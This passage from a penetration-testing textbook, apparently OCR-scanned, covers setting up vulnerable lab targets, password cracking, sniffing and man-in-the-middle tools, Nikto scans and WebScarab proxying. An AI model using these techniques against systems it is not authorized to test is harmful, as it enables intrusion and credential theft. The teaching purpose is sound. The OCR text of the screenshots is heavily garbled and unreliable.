7072demonstrates using the Meterpreter "Is" command to list the contents of the
7073current directory and provides proof that our shell is interacting with the
7074target.
7075
7076Obviously at this point the exploitation phase is over for this target!
7077
7078HOW DO I PRACTICE THIS STEP?
7079
7080Practicing exploitation is one of the most challenging, frustrating, time-con-
7081suming and rewarding experiences that can be offered to new hackers and
7082penetration testers. It is probably a fair assumption that if you are reading
7083this book you are interested in hacking. As mentioned earlier, the process of
7084exploitation is the single step most often associated with hacking (even though
7085you now know it is much more!). If you have never successfully "owned"
7086or exploited a target, you are in for quite a treat. The experience of gaining
7087
7088
7089
7090Exploitation CHAPTER 4
7091
7092
7093
7094
7095
7096Fast- Ti ack Metasploi
7097
7098
7099t Autopwn Automated
7100
7101
7102
7103
7104
7105
7106
7107
7108neterpreter > Is
7109
7110
7111
7112
7113
7114
7115
7116
7117
7118
7119
7120
7121
7122
7123
7124
7125
7126
7127
7128
7129
7130
7131Listing: c:\
7132
7133
7134
7135
7136
7137
7138
7139
7140
7141
7142
7143
7144
7145
7146
7147
7148
7149
7150
7151
7152
7153
7154Mode
7155
7156
7157Size
7158
7159
7160Type
7161
7162
7163Last modified
7164
7165
7166
7167
7168
7169
7170
7171
7172Niime
7173
7174
7175100777/ ruxruxrux
7176
7177
71780
7179
7180
7181f'i I
7182
7183
7184Tue
7185
7186
7187Nov
7188
7189
719024
7191
7192
719312
7194
7195
7196: 04:02
7197
7198
71990600
7200
7201
72022009
7203
7204
7205AUTOEXEC.BAT
7206
7207
7208100666/ ru-ru- ru-
7209
7210
72110
7212
7213
7214fil
7215
7216
7217Tue
7218
7219
7220Nov
7221
7222
722324
7224
7225
722612;
7227
7228
7229: 04:02
7230
7231
7232-0600
7233
7234
72352009
7236
7237
7238CONFIG.SYS
7239
7240
724140777/ruxruxrux
7242
7243
72440
7245
7246
7247dir
7248
7249
7250Thu
7251
7252
7253Dec
7254
7255
725623
7257
7258
72591 3
7260
7261
7262: 36:24
7263
7264
72650600
7266
7267
72682010
7269
7270
7271Docunents an
7272
7273
7274d Settings
7275
7276
7277
7278
7279
7280
7281
7282
7283
7284
7285
7286
7287
7288
7289
7290
7291
7292
7293
7294
7295
7296
7297100444 /r r r
7298
7299
73000
7301
7302
7303n i
7304
7305
7306Tue
7307
7308
7309Nov
7310
7311
731224
7313
7314
731512
7316
7317
7318: 04:02
7319
7320
73210600
7322
7323
73242009
7325
7326
732710. SYS
7328
7329
7330100444/r-- r — r—
7331
7332
73330
7334
7335
7336fil
7337
7338
7339Tue
7340
7341
7342Nov
7343
7344
734524
7346
7347
734812:
7349
7350
7351: 04:02
7352
7353
7354-0600
7355
7356
73572009
7358
7359
7360MSDOS.SYS
7361
7362
7363100555/r-xr-xr-x
7364
7365
736645124
7367
7368
7369fil
7370
7371
7372Thu
7373
7374
7375Aug
7376
7377
737823
7379
7380
7381OB
7382
7383
7384: 00:00
7385
7386
7387-0500
7388
7389
73902001
7391
7392
7393NTDETECT.COM
7394
7395
739640555/r-xr-xr-x
7397
7398
73990
7400
7401
7402dir
7403
7404
7405Thu
7406
7407
7408Eta
7409
7410
741123
7412
7413
741411
7415
7416
7417: 36:37
7418
7419
7420-0600
7421
7422
74232010
7424
7425
7426Program File
7427
7428
7429a
7430
743140777/ruxruxrwx
7432
7433
74340
7435
7436
7437dir
7438
7439
7440Hon
7441
7442
7443Mar
7444
7445
744622
7447
7448
744923
7450
7451
7452: 35:43
7453
7454
7455-0500
7456
7457
74582010
7459
7460
7461RECYCLER
7462
7463
746440777/rwxruxrwx
7465
7466
74670
7468
7469
7470dir
7471
7472
7473Tue
7474
7475
7476Nov
7477
7478
747924
7480
7481
748212
7483
7484
7485: 06:54
7486
7487
7488-0600
7489
7490
74912009
7492
7493
7494System Volum
7495
7496
7497e Information
7498
7499
7500
7501
7502
7503
7504
7505
7506
7507
7508
7509
7510
7511
7512
7513
7514
7515
7516
7517
751840777/rwxrwxrux
7519
7520
75210
7522
7523
7524dir
7525
7526
7527Hon
7528
7529
7530Mar
7531
7532
7533IS
7534
7535
753614
7537
7538
7539: 32:14
7540
7541
75420500
7543
7544
75452010
7546
7547
7548WINDOWS
7549
7550
755140777/ruxruxrux
7552
7553
75540
7555
7556
7557dir
7558
7559
7560I Lit-
7561
7562
7563Nov
7564
7565
756623
7567
7568
7569IS
7570
7571
7572: 05:03
7573
7574
7575-0600
7576
7577
75782010
7579
7580
7581WUTemp
7582
7583
7584100666/ru- ru-rw-
7585
7586
7587194
7588
7589
7590m
7591
7592
7593Tue
7594
7595
7596Nov
7597
7598
759924
7600
7601
760212:01:00
7603
7604
7605-0600
7606
7607
76082009
7609
7610
7611boot .ini
7612
7613
7614100777/ruxruxrwx
7615
7616
7617114688
7618
7619
7620m
7621
7622
7623Tue
7624
7625
7626Nov
7627
7628
762923
7630
7631
76321ft
7633
7634
7635;40:08
7636
7637
7638-0600
7639
7640
76412010
7642
7643
7644calc .exe
7645
7646
7647100444/r— r— r—
7648
7649
7650222368
7651
7652
7653fil
7654
7655
7656Thu Aug 23 06:00:00
7657
7658
7659-0500
7660
7661
76622001
7663
7664
7665ntldr
7666
7667
7668100666/ru-ru-ru-
7669
7670
7671805306368
7672
7673
7674fil
7675
7676
7677tied
7678
7679
7680Dec
7681
7682
768329
7684
7685
768617:22:36
7687
7688
7689-0600
7690
7691
76922010
7693
7694
7695p>if>af i 1 • riijr.
7696
7697
7698meterpreter > |
7699
7700
7701
7702
7703
7704
7705
7706
7707
7708
7709
7710
7711
7712
7713
7714
7715
7716
7717
7718
7719
7720
7721
7722FIGURE 4.24
7723
7724Fast-Track Proof of Concept.
7725
7726
7727
7728administrative access on another machine is a thrill that is both electrifying
7729and unique.
7730
7731There are several ways to practice this step; the easiest way is to set up a vulner-
7732able target in your penetration-testing lab. Once again, using virtual machines
7733is helpful because exploitation can be a very destructive process and resetting
7734a virtual machine is often easier and faster than reimaging a physical machine.
7735
7736If you are new to exploitation, it is important that you have a few immedi-
7737ate successes. This will keep you from getting discouraged as you progress and
7738move onto more difficult targets where the exploitation process becomes more
7739tedious and difficult. As a result it is suggested that you start learning exploi-
7740tation by attacking old, unpatched versions of operating systems and software.
7741Successfully exploiting these systems should give you motivation to learn more.
7742There are many examples of students becoming quickly and permanently dis-
7743illusioned with exploitation and hacking because they attempted to attack
7744the latest-greatest-fully-patched operating system and fell flat on their face.
7745Remember this book focuses on the basics. Once you master the tools and tech-
7746niques discussed here, you will be able to move onto the more advanced topics.
7747If you are new to this process, let yourself win a little and enjoy the experience.
7748
7749If possible, you should try to obtain a legal copy of Microsoft's XP to add to
7750your pen testing lab environment. You should be able to find a legal copy on
7751
7752
7753
7754The Basics of Hacking and Penetration Testing
7755
7756
7757
7758eBay, Amazon, or Craigslist. Just make sure you are purchasing a genuine copy
7759so that you can stay on the right side of the EULA. It is always suggested that
7760newcomers begin with XP because there are still abundant copies available and
7761there are standing exploits in the Metasploit Framework that will allow you to
7762practice your Metasploit-fu.
7763
7764When building your pen testing lab, it is recommended that you find the low-
7765est Service Pack edition of XP as each service pack level patches a number of
7766holes and vulnerabilities. With this advice in mind, XP with no service pack
7767installed is best. XP SP 1 would be next best; XP SP 2 and XP SP 3 are the
7768least desirable. This is because Microsoft introduced some significant security
7769changes to XP beginning with Service Pack 2. However, even XP SP 3 has at
7770least 1 standing exploit and can still make an excellent vulnerable target.
7771
7772Old versions of Linux are also a great source of "exploitable targets." The crew
7773from Backtrack created a free Metasploit training module called "Metasploit
7774Unleashed." It is strongly recommended that you explore this resource after
7775completing this book. The Metasploit Unleashed project contains a detailed
7776description of how to download and set up Ubuntu 7.04 with SAMBA installed.
7777Creating a virtual machine with Ubuntu 7.04 and SAMBA running is a way of
7778setting up a free (as in no cost) vulnerable target and allows you practice attack-
7779ing a Linux system.
7780
7781Metasploit itself has also released a vulnerable target that can be used to
7782practice exploitation. The target system is a Linux virtual machine called
7783"Metasploitable." Metasploitable is based on Ubuntu 8.04 and is available at no
7784charge. You can download your copy of Metasploitable by grabbing the torrent
7785on the Metasploit Express Community site. The virtual machine is configured to
7786run as a live distribution, so if you destroy the system beyond repair, you simply
7787have to reboot it to start over from scratch. This is a great way to practice.
7788
7789Finally, Thomas Wilhelm has graciously created and offered for free a series
7790of entertaining, challenging, and highly customizable live Linux CDs called
7791De-ICE. The De-ICE CDs allow you to practice a series of penetration test-
7792ing challenges following a realistic scenario. You can get your hands on these
7793great CDs by downloading them at http://heorot.net/livecds/. The CDs are great
7794because they present you with a realistic simulation of an actual penetration test.
7795
7796Another great feature of the De-ICE CDs is that you would not be able to sim-
7797ple Autopwn your way through the challenges. Each De-ICE CD includes sev-
7798eral different levels of challenges that you must complete. As you work your
7799way through the challenges, you will need to learn to think critically and use
7800many of the tools and techniques we have discussed in steps 1-3.
7801
7802The only word of caution when using these awesome CDs (or any preconfig-
7803ured lab for that matter) is that you should be very careful about asking for
7804too much help, giving up too soon, and relying on the hints too often. Live
7805CDs like De-ICE hold a tremendous value but oftentimes you only get to
7806work through them a single time. Once you have read the hint or solution to
7807
7808
7809
7810Exploitation CHAPTER 4
7811
7812
7813
7814a problem, there is no way to put the "answer Jinni" back into the bottle, as
7815you will most likely remember the answer forever. As a result, you are encour-
7816aged to have persistence and tough it out. If you have read and practiced every-
7817thing that has been discussed up to this point, you will have the ability to gain
7818administrative access to the first De-ICE disk.
7819
7820Of course, you can always go back and rerun the challenges and you are
7821encouraged to do so, but it will be different the second time around because
7822you will know what to look for. Take your time, enjoy the challenge, and work
7823through the issues you encounter. Believe it or not, there is tremendous value
7824and learning potential in banging your head against a seemingly insurmount-
7825able problem. If you want to be a penetration tester, you will need to learn to
7826be persistent and resourceful. Embrace the challenges you encounter as a learn-
7827ing situation and make the most of them.
7828
7829Setting up and working your way through all the vulnerable targets described
7830above should be an enjoyable process. Below you will find some specific tips
7831for setting up targets to practice each of the tools that were discussed in this
7832chapter.
7833
7834The easiest way to practice Medusa is to start a remote process on a target
7835machine. Try starting Telnet on a Windows machine and SSH or FTP on a
7836Linux machine. You will need to create a few additional users and passwords
7837with access to the remote services. Once you have the remote service running,
7838you can practice using Medusa to gain access to the remote system.
7839
7840The easiest way to practice Metasploit and Fast-Track is by setting up an older
7841version of Windows XP as the target; remember the lower the service pack, the
7842better. You can also download a copy of Ubuntu 7.04 and install SAMBA on it
7843or find Metasploit's own "Metasploitable" virtual machine.
7844
7845To practice with John the Ripper and chntpw, you can set up a victim machine
7846with several user accounts and different passwords. It is highly suggested that
7847you vary the strength of the passwords for each account. Make a few user
7848accounts with weak three- and four-letter passwords and make others with
7849longer passwords that include upper and lowercase letters along with special
7850characters.
7851
7852WHERE DO I GO FROM HERE?
7853
7854At this point you should have a solid understanding of the basic steps required
7855to exploit and gain access to a system. Remember your attack methods will
7856change based on your target and desired goal. Now that you understand the
7857basics, you should be ready to tackle some more advanced topics.
7858
7859You should take some time and review the password brute forcing tool Hydra.
7860This tool functions much like Medusa but provides a few extra switches to give
7861you some additional options. Carefully review each of the switches supported
7862by Hydra. You can find the switches and a brief description by reviewing the
7863
7864
7865
7866The Basics of Hacking and Penetration Testing
7867
7868
7869
7870Hydra man pages. It is recommended that you pay special attention to the tim-
7871ing option. The ability to control the timing or rate of connections is handy for
7872correcting many connection errors that occur when we utilize online password
7873crackers.
7874
7875Along with your own personal password dictionary you should begin build-
7876ing a list of default usernames and passwords for various network devices. As
7877you progress in your penetration testing career, you will probably be surprised
7878at how often you will come across devices like routers, switches, modems, fire-
7879walls, etc., that still use a default username and password. It is not uncommon
7880to find PT stories where the penetration tester was able to take complete con-
7881trol of a boarder router and redirect all internal and external traffic because
7882the company administrator had forgotten to change the default username
7883and password. It does little good to spend time configuring and securing your
7884device if you fail to change the username and password. There are several good
7885starter lists of default usernames and passwords available online.
7886
7887Another great tool for password cracking is RainbowCrack. RainbowCrack is
7888a tool that relies on Rainbow tables to crack passwords. A Rainbow table is a
7889precomputed list of password hashes. Recall that traditional password-cracking
7890tools like John the Ripper go through a three-step process. First, the tool must
7891generate a potential password; next, the tool needs to create a hash of the cho-
7892sen word; and finally, the password-cracking tool has to compare the generated
7893hash with the password hash. Rainbow tables are much more efficient because
7894they make use of precomputed password hashes. This means that the cracking
7895process reduces two out of the three steps and simply needs to compare hashes
7896to hashes.
7897
7898There are lots of great tools that can be explored and used for sniffing. It is
7899highly recommended that you spend time getting to know and use Wireshark.
7900This book covered only the basics, but Wireshark is a deep program with many
7901rich features. You should learn how to use the filters, follow data streams,
7902and view information on specific packets. Once you are comfortable with
7903Wireshark, digging into dsniff is highly recommended. As mentioned earlier,
7904dsniff is an incredible suite with tons of great tools. With some self-study and
7905practice, you can even learn to intercept encrypted traffic like SSL.
7906
7907Ettercap is another fantastic tool that has many powerful features and abili-
7908ties. Ettercap is a great tool for conducting man-in-the-middle attacks. Ettercap
7909works by tricking clients into sending network traffic through the attacker
7910machine. This is a great way to get usernames and passwords from machines
7911on the local LAN. Once you have successfully studied and used Wireshark,
7912dsniff, and Ettercap, you will be well on your way to mastering the basics of
7913network sniffing.
7914
7915After reviewing and understanding the basics of Metasploit, you should dig in
7916and learn the details of the Meterpreter payload. There are dozens of switches,
7917commands, and ways to interact with the Meterpreter. You should learn and
7918
7919
7920
7921Exploitation CHAPTER 4
7922
7923
7924
7925practice them all. Learning how to control this amazing payload will pay
7926mountains of dividends in your exploitation career. It is important that you
7927understand using Metasploit in combination with the Meterpreter is one of
7928the most lethal amalgamations available to a new penetration tester. Do not
7929underestimate or overlook this powerful tool.
7930
7931Until now only automated attacks have been discussed. Even though it can be
7932extremely entertaining to push buttons and pwn remote systems, if you never
7933advance your skill level beyond this point, you will be a script kiddie forever.
7934Initially we all start out as a person who must rely on others to develop and
7935release new exploit tools, but to become truly elite you will need to learn how
7936to read, write, and create your own exploits. While creating your own exploits
7937may seem daunting at first, it is a process that becomes much easier the more
7938you learn. A good place to start learning about exploitation is by getting to
7939know buffer overflows.
7940
7941Stack and heap based buffer overflows, which are responsible for many of
7942the exploits available today, often seem like magic or voodoo to newcom-
7943ers. However, with some dedicated and careful self-study, these topics can be
7944demystified and even mastered.
7945
7946Advancing your skill level to the point of being able to find buffer overflows and
7947write shell code often requires some additional training. Although this train-
7948ing is not strictly required, it certainly makes the process of learning advanced
7949exploitation much easier. Whenever possible, you should spend time learning a
7950programming language like "C." Once you are comfortable with C, you should
7951focus on understanding at least the basics of Assembly Language. Having a solid
7952understanding of these topics will help dispel much of the "black-magic" feel
7953many people have when they first encounter buffer overflows.
7954
7955SUMMARY
7956
7957This chapter focused on step 3 of our basic methodology: exploitation.
7958Exploitation is the process most newcomers associate directly with "hacking."
7959Because exploitation is a broad topic, the chapter examined several different
7960methods for completing this step including using the online password cracker
7961Medusa to gain access to remote systems. The process of exploiting remote vul-
7962nerabilities with Metaploit was discussed as well as several payloads that can be
7963used with Metasploit. John the Ripper was introduced for cracking local pass-
7964words. A tool for password resetting was shown for those times when a penetra-
7965tion tester does not have time to wait for a password cracker. Wireshark was
7966used to sniff data off the network and macof was used to sniff network traffic
7967on a switched network. Finally, Fast-Track Autopwn was shown as a one-stop
7968shop for the exploitation phase.
7969
7970
7971
7972This page intentionally left blank
7973
7974
7975
7976
7977Information in This Chapter:
7978
7979â– Interrogating Web Servers: Nikto
7980
7981â– Websecurify: Automated Web Vulnerability Scanning
7982
7983â– Spidering: Crawling Your Target's Website
7984
7985â– Intercepting Requests with WebScarab
7986
7987â– Code Injection Attacks
7988
7989â– Cross-Site Scripting: Browsers That Trust Sites
7990
7991
7992
7993The Basics of Hacking and Penetration Testing
7994
7995
7996
7997INTRODUCTION
7998
7999Now that you have a good understanding of common network-based attacks, it
8000is important to take some time to discuss the basics of web-based exploitation.
8001The web is certainly one of the most common attack vectors available today
8002because everything is connected to the Internet. Nearly every company today
8003has a web presence, and more often than not, that web presence is dynamic
8004and user-driven. Previous-generation websites were simple static pages coded
8005mostly in HTML. By contrast, many of today's websites include complex cod-
8006ing with backend database-driven transactions and multiple layers of authen-
8007tication. Home computers, phones, appliances, and of course systems that
8008belong to our targets are all connected to the Internet.
8009
8010As our dependence and reliance on the web continues to expand, so does the
8011need to understand how this attack vector can be exploited.
8012
8013A few years back, people started using words like "Web 2.0" and "cloud-based
8014computing" to describe a shift in the way we interact with our systems and pro-
8015grams. Simply put, these terms are a change in the way computer programs
8016are designed, run, accessed, and stored. Regardless of what words are used to
8017describe it, the truth of the matter is that the Internet is becoming more and
8018more "executable." It used to be that programs like Microsoft Office had to be
8019installed locally on your physical computer. Now this same functionality can
8020be accessed online in the form of Google Docs and many other cloud com-
8021puting services. In many instances, there is no local installation and your data,
8022your programs, and your information reside on the server in some physically
8023distant location.
8024
8025As mentioned earlier, companies are also leveraging the power of an executable
8026web. Online banking, shopping, and record-keeping are now common place.
8027Everything is interconnected. In many ways, the Internet is like the new "wild
8028west." Just when it seemed like we were making true progress and fundamen-
8029tal changes to the way we program and architect system software, along comes
8030the Internet and gives us a new way to relearn and repeat many of the security
8031lessons from the past. As people rush to push everything to the web and sys-
8032tems are mashed up and deployed with worldwide accessibility, new attacks
8033are developed and distributed at a furious pace.
8034
8035It is important that every aspiring hacker and penetration tester understand at
8036least the basics of the web-based exploitation.
8037
8038INTERROGATING WEB SERVERS: NIKTO
8039
8040After running a port scan and discovering a service running on port 80 or port
8041443, one of the first tools that should be used to evaluate the service is Nikto.
8042Nikto is a web server vulnerability scanner. This tool was written by Chris
8043Sullo and David Lodge. Nikto automates the process of scanning web servers
8044
8045
8046
8047Web-Based Exploitation CHAPTER 5
8048
8049
8050
8051for out-of-date and unpatched software as well as searching for dangerous files
8052that may reside on web servers. Nikto is capable of identifying a wide range of
8053specific issues and also checks the server for configuration issues. The current
8054version of Nikto is built into Backtrack and available in the /pentest/scanners/
8055nikto directory. If you are not using Backtrack, Nikto can be obtained by down-
8056loading it from the http://www.cirt.net/Nikto2 website. Please note you will
8057need Perl installed to run Nikto.
8058
8059To view the various options available, you can run the following command
8060from inside the /pentest/scanners/nikto directory:
8061
8062perl nikto.pl
8063
8064Running this command will provide you with a brief description of the
8065switches available to you. To run a basic vulnerability scan against a target, you
8066need to specify a host IP address with the "-h" switch. You should also specify
8067a port number with the "-p" switch. You can instruct Nikto to scan multiple
8068ports by specifying a port range. For example to scan for web servers on all
8069ports between 1 and 1000, you would issue the following command in a termi-
8070nal window (again you must be in the /pentest/scanners/nikto directory):
8071
8072perl nikto.pl -h 172.16.45.129 -p 1-1000
8073
8074If you fail to specify a port number, Nikto will only scan port 80 on your tar-
8075get. If you want to save the Nikto output for later review, you can do so by
8076issuing the "-o" followed by the file path and name of the file you would like
8077to use to save the output. Figure 5.1 includes a screenshot of the Nikto output
8078from our example.
8079
8080
8081
8082root@bt:/pentest/5C3rmers/nikto# ./nikto. pi h 172. 16. 4S. 129 -p 1-1998
8083- Nikto V2.1.2
8084
8085
8086
8087* Target IP:
8088
8089* Target Hostname;
80904 Target Port:
8091
8092+ Start Tine:
8093
8094
8095
8096172.16.45.129
8097172.16.45.129
809888
8099
81002618-16-21 61:45:19
8101
8102
8103
8104+ Server: Apache/2. 2.9 (Ubuntu) PHP/5.2. 6-2ubuntu4. 5 with Suhosin-Patch
8105
8106* Number of sections in the version string differ from those in the database, the server reports
8107: apache/2.2.9 white the database has: 2. 2. IS. This may cause false positives.
8108
8109* Number of sections in the version string differ from those in the database, the server reports
8110: php/5.2.6-2ubuntu4.5 while the database has: 5.3.2. This may cause false positives.
8111
8112+ PHP/5 .2. 6-2ubuntu4.5 appears to be outdated (current is 3t least 5.3.21
8113
8114+ ETag header found on server, inode: 364643, size: 45, mtime; 6*46af 3f 163d566
8115
8116* Allowed HTTP Methods: 6ET, HEAD, P6ST, DPTI6NS, TRACE
8117
8118* DSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
8119
8120* USVDS-326&: /icons/: Directory indexing found.
81216SV06.3268: /icons/: Directory indexing found.
8122
8123+ 0SVD8-3233: /icons/README; Apache default file found.
8124
8125+ 6414 items checked: 1 error(s) and 9 item(s) reported on remote host
8126
8127<â– End Time: 2819- 18-21 61:45:42 (23 seconds)
8128
8129
8130
8131U 1 host(s) tested
8132
8133
8134
8135FIGURE 5.1
8136
8137Output of the Nikto Web Vulnerability Scanner.
8138
8139
8140
8141The Basics of Hacking and Penetration Testing
8142
8143
8144
8145WEBSECURIFY: AUTOMATED WEB
8146VULNERABILITY SCANNING
8147
8148Another great tool to use when first interacting with a target web server is
8149Websecurify. Websecurify provides an easy-to-use interface that allows pen-
8150etration testers to quickly and easily identify web vulnerabilities including
8151SQL injection, cross-site scripting, file includes, cross-site request forgery, and
8152others.
8153
8154Websecurify can be set up and used with little configuration making it very
8155handy for people who are new to web penetration testing. You can access
8156Websecurify by clicking: K-Start dragon — * Backtrack — » Web Application
8157Analysis — » Web (front end) — » Web Security.
8158
8159After starting the program you will be presented with a "Getting Started" page;
8160you can begin your test by clicking on the "Start new automated test" link as
8161shown in Figure 5.2.
8162
8163After clicking the "Start new automated test," you will be presented with a
8164Start Test window. You will need to enter a URL or IP address in the "Target"
8165textbox. Entering information in the "Workspace" textbox is optional, as
8166Websecurify will automatically generate this for you when you enter a target.
8167Figure 5.3 shows the Start Test window; once you have entered a URL or IP
8168address, you can click the "OK" button to begin your test.
8169
8170Once the test is completed, you will be presented with a workspace report
8171that will allow you to view specific details and issues that were discovered by
8172Websecurify. You can view the specific information by clicking the triangle to
8173expand the findings. Figure 5.4 shows the output from our scan.
8174
8175
8176
8177JU Edit Tboli Ht!p
8178
8179
8180
8181
8182WEBSECURIFY
8183
8184
8185Ctt Stamd wltn Wtfi M currty
8186
8187
81881 "
8189/
8190
8191
8192
8193
8194
8195
8196bji v e Fi e on In; Joe i/n i-nUl q n
8197
8198
8199
8200
8201
8202
82030
8204
8205;.l
8206
8207
8208
8209
8210
8211FIGURE 5.2
8212
8213Starting an Automated Web Test Using Websecurify.
8214
8215
8216
8217Web-Based Exploitation
8218
8219
8220
8221CHAPTER 5
8222
8223
8224
8225Type a target and an associated workspace name, if you do not wish to
8226specify a workspace name, the wizard will automatically generate one
8227based on the target and the current date, vou can also choose an existing
8228workspace in which case all new test results will be merged with any
8229previous results.
8230
8231
8232
8233Workspace
8234
8235
8236
8237Q customize worksp ace name
8238Target OtW/172. 16-45-1 32
8239
8240; rj , : , â– mm ,| - ! ,yj*l
8241
8242
8243
8244X cancel I I VOK
8245
8246
8247
8248FIGURE 5.3
8249
8250Entering a Target in the Websecurify Start Test Window.
8251
8252
8253
8254p
8255
8256
8257e L Jrt fools ■•. ndow i lelp
8258
8259
8260
8261
82621
8263
8264
8265Launch*- | Alport liiuti
8266
8267
8268
8269
8270
8271
8272
8273
8274
8275
8276
8277
8278
8279
8280Q Vanilla ^QL ir F:>:n
8281
8282
8283
8284
8285
8286
8287> A put Mtthod ErnUcd
8288
8289> A Ofrtt MMhftd enabled
8290
8291> A CONNECT Method Enabled
8292b dl S^tom Path Disd&Wf*
8293
8294KjJ Coo&ef rwl Flagged » HTTPOriry
8295
8296> (J TRACE Method Enabted
8297
8298
82991
8300
8301
8302
8303
8304
8305
8306
8307
8308
8309
8310
8311
8312Vanilla SQL Injection
8313
8314
8315
8316
8317
8318
8319
8320
8321database type;
8322
8323
8324
8325
8326
8327
8328
8329
8330request;
8331
8332
8333
8334
8335
8336
8337
8338
8339GET http://172.le.«.1^2/lnfo.php?■, HTTP/1. 1
8340
8341
8342
8343
8344
8345
8346
8347
8348
8349
8350
8351
8352
8353
8354
8355FIGURE 5.4
8356
8357Websecurify Report.
8358
8359
8360
8361As you can see, Websecurify found several issues including an SQL injection
8362vulnerability. SQL injection attacks will be discussed in a later section of this
8363chapter.
8364
8365SPIDERING: CRAWLING YOUR TARGET'S WEBSITE
8366
8367Another great tool to use when initially interacting with a web target is
8368WebScarab. WebScarab was written by Rogan Dawes and is available through
8369the OWASP website. If you are running Backtrack, a version of WebScarab is
8370already installed. This powerful framework is modular in nature and allows
8371
8372
8373
8374The Basics of Hacking and Penetration Testing
8375
8376
8377
8378you to load numerous plug-ins to customize it to your needs. Even in its
8379default configuration, WebScarab provides an excellent resource for interacting
8380with and interrogating web targets.
8381
8382After having run the vulnerability scanners, Nikto and Websecurify, the next
8383logical step is to run a spidering program on the target website. Spiders are
8384extremely useful in reviewing and reading (or crawling) your target's website
8385looking for all links and associated files. Each of the links, web pages, and files
8386discovered on your target are recorded and cataloged. This cataloged data can
8387be useful for accessing restricted pages and locating unintentionally disclosed
8388documents or information.
8389
8390You can access the spider function in WebScarab by first starting the program
8391through the K-Start dragon. This can be accomplished by clicking: K-Start
8392dragon — » Backtrack — * Web Application Analysis — » Web (front end) — ►
8393Webscarab lite.
8394
8395This will load the WebScarab program. However, before you can begin spider-
8396ing your target, you will need to switch to the "full-featured interface." You can
8397do this by clicking on the "Tools" menu and putting a checkbox in the "Use
8398full-featured interface" checkbox as shown in Figure 5.5.
8399
8400After switching to the full-featured interface, you will be prompted to restart
8401WebScarab. Once you restart the tool, you will be given access to a number of
8402new panels along the top of the window including the "Spider" tab.
8403
8404Now that you have set up WebScarab, you need to configure your browser to
8405use a proxy. Setting up WebScarab as your proxy will cause all the web traf-
8406fic going into and coming out of your browser to pass through the WebScarab
8407program. In this respect, the proxy program acts as a middle man and has the
8408ability to view, stop, and even manipulate network traffic.
8409
8410Setting up your browser to use a proxy is usually done through the prefer-
8411ences or network options. In Firefox, you can click on: Edit — » Preference. In
8412the Firefox Preferences window, click the "Advanced" menu followed by the
8413"Network" tab. Finally, click on the "Settings" button as shown in Figure 5.6.
8414
8415Clicking on the settings button will allow you to configure your browser to use
8416WebScarab as a proxy. Select the radio button for "Manual proxy configura-
8417tion:". Next enter: 127.0.0.1 in the "HTTP Proxy:" input box. Finally enter: 8008
8418
8419
8420
8421
8422
8423
8424
8425till fciew
8426
8427
8428Iool* u«if*
8429
8430
8431Stimnuy
8432
8433
8434Proxies
8435
8436
8437
8438
8439JlcC Vet<
8440
8441
8442Credent^!*
8443
8444
8445
8446
8447US
8448
8449
8450u& i comrwn I senpi* 1
8451
8452
8453
8454
8455^Use I ill r « .i ItntilacO
8456
8457
8458
8459
8460
8461FIGURE 5.5
8462
8463Switching WebScarab to Run in Full-featured Interface Mode.
8464
8465
8466
8467Web-Based Exploitation CHAPTER 5
8468
8469
8470
8471i 1 4 a* a ji
8472
8473Mam T*bi Content Applications Privacy Security
8474
8475
8476
8477
8478
8479Encryption
8480
8481
8482
8483Connection
8484Configure how Rrofon connects to the Internet
8485
8486Offline Storage
8487
8488yseuplo | sc * MS o( space for the cjc he
8489
8490
8491
8492iDCtear Now
8493
8494
8495
8496x jell m« wh«n a wabsite aik* to ttore data for offline | EgcepttOM ]
8497The following webutet have stored data for offline uie:
8498
8499
8500
8501« ■Jfefr'P 1 i X close | -
8502
8503FIGURE 5.6
8504
8505Setting Up Firefox to Use WebScarab as a Proxy.
8506
8507
8508
8509Connection setting*
8510
8511
8512
8513Configure Proxies to Access the internet
8514
8515O NO proxy
8516
8517O Auto-detect proxy setting* for this network
8518( ] 'j -J-; system proxy settings
8519Manual proxy configuration ;
8520
8521
8522
8523HTTP Proxy; ! 127.0.0.1
8524
8525
8526
8527I Eort; ["
8528
8529
8530
8531X Use this proxy server for all protocols.
8532
8533
8534
8535J»" L
8536] [
8537
8538
8539
8540tto Proxy for: i localhoit. 127.0.0.1
8541
8542
8543
8544Example: .mozaia.org. .net.nz. 19?. l&B. 1.0/24
8545Automatic proxy conhguralion URL:
8546
8547
8548
85499
8550
8551
8552
8553i »<*«-i i n^oK" "
8554
8555
8556
8557FIGURE 5.7
8558
8559Firefox Connection Settings for Using WebScarab as a Proxy.
8560
8561
8562
8563into the "Port" field. It is usually a good idea to check the box just below the
8564"HTTP Proxy" box and select "Use this proxy server for all protocols." Once you
8565have all of this information entered, you can click "OK" to exit the Connection
8566Settings window and "Close" to exit the Firefox Preferences window. Figure 5.7
8567shows an example of my Firefox Connection Settings window.
8568
8569At this point, any web traffic coming into or passing out of your browser will
8570route through the WebScarab proxy. Two words of warning: First you need to
8571
8572
8573
8574The Basics of Hacking and Penetration Testing
8575
8576
8577
8578leave WebScarab running while it is serving as a proxy. If you close the pro-
8579gram, you will not be able to browse the Internet. If this happens, Firefox is
8580great at providing you with an error message that it cannot find a proxy
8581and you will need to restart WebScarab or change your network configura-
8582tion in Firefox. The second warning is that while surfing the Internet using
8583a local proxy, all https traffic will show up as having an invalid certificate!
8584This is expected behavior because your proxy is sitting in the middle of your
8585connection.
8586
8587As a side note, it is important that you always pay attention to invalid security
8588certificates when browsing. At this point, certificates are your best defense and
8589often your only warning against a man-in-the-middle attack.
8590
8591Now that you have set up a proxy and have configured your browser, you are
8592ready to begin spidering your target. You begin by entering the target URL
8593into the browser. In our earlier example, we discovered a website running on
8594172.16.45.132. Entering the following into your Firefox browser will load the
8595website through WebScarab. Once the website has loaded in your browser, you
8596can switch over the WebScarab program. You should see the URL you entered
8597(along with any others that you have visited since starting your proxy). To spider
8598the site, you right click the URL and choose "Spider tree" as shown in Figure 5.8.
8599
8600You can now view each of the files and folders associated with your target web-
8601site. Individual folders can be further spidered by right clicking and choosing
8602"Spider tree" again. You should spend time carefully examining every nook
8603and cranny within your authorized scope. Spidering a website is a great way to
8604find inadvertently or leaked confidential data from a target website.
8605
8606
8607
8608£111 tflW tklp
8609
8610w.i mi S(t»ioi>]D ttflirym ^ni|H,ii Fi*5iti*ww Ftiiitt (amiwi J lank j
8611
8612simimiiv Mtttatet i -i ntn i-" wtbitnkti SnidM Lurnfioni
8613
86143 Trftstlfttloii Tiltm *<in**ri*twn nil
8615
8616
8617
8618
8619
8620
8621
8622
8623
8624
8625* DS: 35
8626
8627
8628
